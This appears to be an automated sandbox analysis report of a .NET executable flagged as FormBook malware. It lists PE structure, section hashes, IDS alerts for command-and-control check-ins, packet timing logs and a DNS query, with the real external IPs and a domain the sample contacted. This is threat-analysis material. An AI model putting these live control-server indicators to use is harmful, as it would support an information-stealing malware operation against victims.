                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xd2c680x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x21e0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xd0cc0 | 0xd0e00 | 0e701e1a1d454b99f3a5e50a08b78eae | False | 0.8907594161430281 | data | 7.7118543054042075 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xd4000 | 0x21e0 | 0x2200 | f9dcf40ced0142a0111d2e552dd031c0 | False | 0.9308363970588235 | data | 7.6202987927159525 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xd8000 | 0xc | 0x200 | 86e11b6d885b2c062e977831a8d08cf8 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
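
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xd40c8 | 0x1e1f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9939048113085203 |
| RT_GROUP_ICON | 0xd5ef8 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xd5f1c | 0x2c0 | data | | | 0.4616477272727273 |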

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-10T21:31:07.184740+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64216 | 154.12.28.184 | 80 | TCP |
| 2025-01-10T21:31:07.184740+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64216 | 154.12.28.184 | 80 | TCP |
| 2025-01-10T21:31:23.748355+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64218 | 18.139.62.226 | 80 | TCP |
| 2025-01-10T21:31:26.287701+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64219 | 18.139.62.226 | 80 | TCP |
| 2025-01-10T21:31:28.841664+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64220 | 18.139.62.226 | 80 | TCP |
| 2025-01-10T21:31:31.402837+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64221 | 18.139.62.226 | 80 | TCP |
| 2025-01-10T21:31:31.402837+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64221 | 18.139.62.226 | 80 | TCP |
| 2025-01-10T21:31:37.436320+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64223 | 104.21.16.1 | 80 | TCP |
| 2025-01-10T21:31:39.963653+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64224 | 104.21.16.1 | 80 | TCP |
| 2025-01-10T21:31:42.524530+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64226 | 104.21.16.1 | 80 | TCP |
| 2025-01-10T21:31:45.060492+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64227 | 104.21.16.1 | 80 | TCP |
| 2025-01-10T21:31:45.060492+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64227 | 104.21.16.1 | 80 | TCP |
| 2025-01-10T21:31:58.975927+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64228 | 209.74.77.107 | 80 | TCP |
| 2025-01-10T21:32:01.521771+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64229 | 209.74.77.107 | 80 | TCP |
| 2025-01-10T21:32:04.084071+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64230 | 209.74.77.107 | 80 | TCP |
| 2025-01-10T21:32:06.670746+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64231 | 209.74.77.107 | 80 | TCP |
| 2025-01-10T21:32:06.670746+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64231 | 209.74.77.107 | 80 | TCP |
| 2025-01-10T21:32:12.207852+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64232 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:32:14.762335+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64233 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:32:17.318241+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64234 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:32:19.896502+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64236 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:32:19.896502+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64236 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:32:26.518281+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64237 | 154.208.202.225 | 80 | TCP |
| 2025-01-10T21:32:29.087865+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64238 | 154.208.202.225 | 80 | TCP |
| 2025-01-10T21:32:31.638362+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64239 | 154.208.202.225 | 80 | TCP |
| 2025-01-10T21:32:34.634334+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64240 | 154.208.202.225 | 80 | TCP |
| 2025-01-10T21:32:34.634334+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64240 | 154.208.202.225 | 80 | TCP |
| 2025-01-10T21:32:40.316256+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64241 | 77.68.64.45 | 80 | TCP |
| 2025-01-10T21:32:42.836491+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64242 | 77.68.64.45 | 80 | TCP |
| 2025-01-10T21:32:45.772965+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64243 | 77.68.64.45 | 80 | TCP |
| 2025-01-10T21:32:48.369228+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64244 | 77.68.64.45 | 80 | TCP |
| 2025-01-10T21:32:48.369228+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64244 | 77.68.64.45 | 80 | TCP |
| 2025-01-10T21:32:54.169583+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64245 | 208.91.197.27 | 80 | TCP |
| 2025-01-10T21:32:56.697608+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64246 | 208.91.197.27 | 80 | TCP |
| 2025-01-10T21:32:59.272960+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64247 | 208.91.197.27 | 80 | TCP |
| 2025-01-10T21:33:02.365444+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64248 | 208.91.197.27 | 80 | TCP |
| 2025-01-10T21:33:02.365444+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64248 | 208.91.197.27 | 80 | TCP |
| 2025-01-10T21:33:08.000458+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64249 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:33:10.557059+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64250 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:33:13.126131+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64251 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:33:15.668369+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 64252 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:33:15.668369+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 64252 | 84.32.84.32 | 80 | TCP |
| 2025-01-10T21:33:21.361806+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64253 | 104.21.80.1 | 80 | TCP |
| 2025-01-10T21:33:23.895129+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 64254 | 104.21.80.1 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Jan 10, 2025 21:32:19.438509941 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.438635111 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.452558994 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.457412958 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896372080 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896397114 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896409988 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896421909 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896437883 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896450043 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896478891 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896492958 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896502018 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.896514893 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896528006 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896620989 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.896655083 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.901545048 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.906335115 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:25.576292992 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:25.581114054 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:25.581208944 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:25.597104073 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:25.601991892 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:26.518134117 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:26.518224955 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:26.518280983 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:27.100920916 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.120737076 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.125637054 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:28.128118038 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.141944885 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.146753073 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:29.087755919 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:29.087812901 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:29.087865114 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:29.647871017 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.666376114 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.671257019 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:30.671344995 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.691261053 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.696096897 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:30.696377039 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:31.638020039 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:31.638300896 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:31.638361931 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:32.194533110 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.213210106 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.218175888 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:33.218280077 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.229238033 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.234069109 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:34.634125948 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:34.634243965 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:34.634334087 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:34.637296915 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:34.642102003 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:39.679768085 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:39.684658051 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:39.684755087 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:39.704314947 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:39.709042072 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:40.316082954 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:40.316097021 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:40.316256046 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:41.210225105 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.230015039 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.234872103 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.236362934 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.253525972 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.258450985 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.836327076 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.836430073 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.836491108 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:43.757251978 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:44.784873962 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:45.171367884 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.171616077 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:45.187633038 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:45.192451000 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.192622900 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.772799969 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.772878885 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.772964954 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:46.694566965 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.713793039 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.740053892 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:47.740156889 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.751015902 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.756484032 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:48.368899107 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:48.369072914 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:48.369227886 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:48.371973038 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:48.376806021 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:53.619071960 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:53.623886108 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:53.623950005 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:53.641719103 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:53.646482944 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:54.169518948 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:54.169583082 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:55.147641897 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:55.153177977 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.166670084 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:56.171515942 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.171607018 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:56.187534094 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:56.192320108 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.697544098 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.697607994 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:57.694662094 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:57.699542999 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:58.713366985 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:58.718210936 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:58.718343019 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:58.734687090 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:58.739483118 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:58.739635944 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:59.272682905 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:59.272959948 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:00.244354963 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:00.249475002 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:01.260292053 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:01.265170097 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:01.265278101 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:01.275188923 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:01.279944897 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365308046 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365323067 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365345955 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365364075 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365375996 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365386009 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365400076 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365410089 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365443945 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.365509033 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.409852982 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.409923077 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.409934044 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410031080 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410028934 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.410053968 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410065889 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410087109 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.410118103 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.410439014 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410449028 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410490036 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.455768108 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455781937 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455869913 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455881119 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455916882 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.455964088 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.456160069 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.456223011 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.462230921 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.466981888 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:07.536062956 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:07.540911913 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:07.542402029 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:07.563107014 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:07.567871094 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:07.998229980 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:08.000458002 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:09.069581032 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:09.074402094 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.088373899 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:10.093708038 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.096437931 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:10.112173080 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:10.117089987 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.556829929 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.557059050 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:11.616430998 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:11.621757030 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:12.635334015 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:12.640279055 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:12.640379906 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:12.657037020 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:12.661958933 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:12.662065983 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:13.126008987 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:13.126131058 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:14.163412094 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:14.168421984 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.182275057 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.187104940 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.187207937 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.198080063 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.203171015 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668168068 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668195963 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668210030 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668261051 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668275118 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668287992 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668299913 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668313026 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668325901 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668340921 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668369055 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.668406010 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.668566942 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668605089 CET6425280192.168.2.684.32.84.32
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 21:31:05.009227991 CET | 192.168.2.6 | 1.1.1.1 | 0xd8d8 | Standard query (0) | www.7261ltajbc.bond | A (IP address) | IN (0x0001) | false
